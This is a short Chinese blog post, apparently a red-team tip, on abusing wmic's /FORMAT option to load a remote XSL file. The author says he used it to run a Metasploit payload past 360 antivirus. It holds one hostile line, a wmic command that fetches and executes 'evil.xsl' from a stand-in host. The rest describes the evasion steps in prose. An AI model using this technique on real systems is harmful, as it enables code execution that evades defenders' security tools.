前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Hacking with Style, Stylesheets

Hacking with Style, Stylesheets

作者头像
Jumbo
发布2018-07-26 09:39:22
8050
发布2018-07-26 09:39:22
举报
文章被收录于专栏:中国白客联盟中国白客联盟

前言

前段时间,@subTee放了一个好玩的red team tips,利用wmic来进行bypass。

正文

命令如下

wmic os get /FORMAT:”https://example.com/evil.xsl”

还给了一个demo

我们先利用这个demo试试

发现没问题。

然后我发现有些同学就开始自以为是,以为修改其中的命令就能做到bypass。。。

比如有直接把命令改成木马的

我就想说了,@subTee辛辛苦苦发现这么一个bypass技巧,仅仅是让你把calc改成其他命令的?

那正确操作是什么呢,我们来深入下。

我们看下他的xsl文件格式,发现跟xml格式一样,而且跟之前msxsl的bypass很像。

那我们的目的肯定不是仅仅去执行我们正常就能执行的命令,而是比如能够执行msf payload、mimikatz这种平常被杀软拦截的payload。

首先我们先利用msf生成一个payload

先尝试利用rundll32调用dll试试

拦截,并且把msf.dll杀掉了。

我们来把dll改成我们之前的xsl格式文件

执行看看

看到成功执行,并且绕过了360。

后续

我觉得,这才是@subTee 想让我们看到的,而不是看个表面。

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2018-05-31,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 中国白客联盟 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档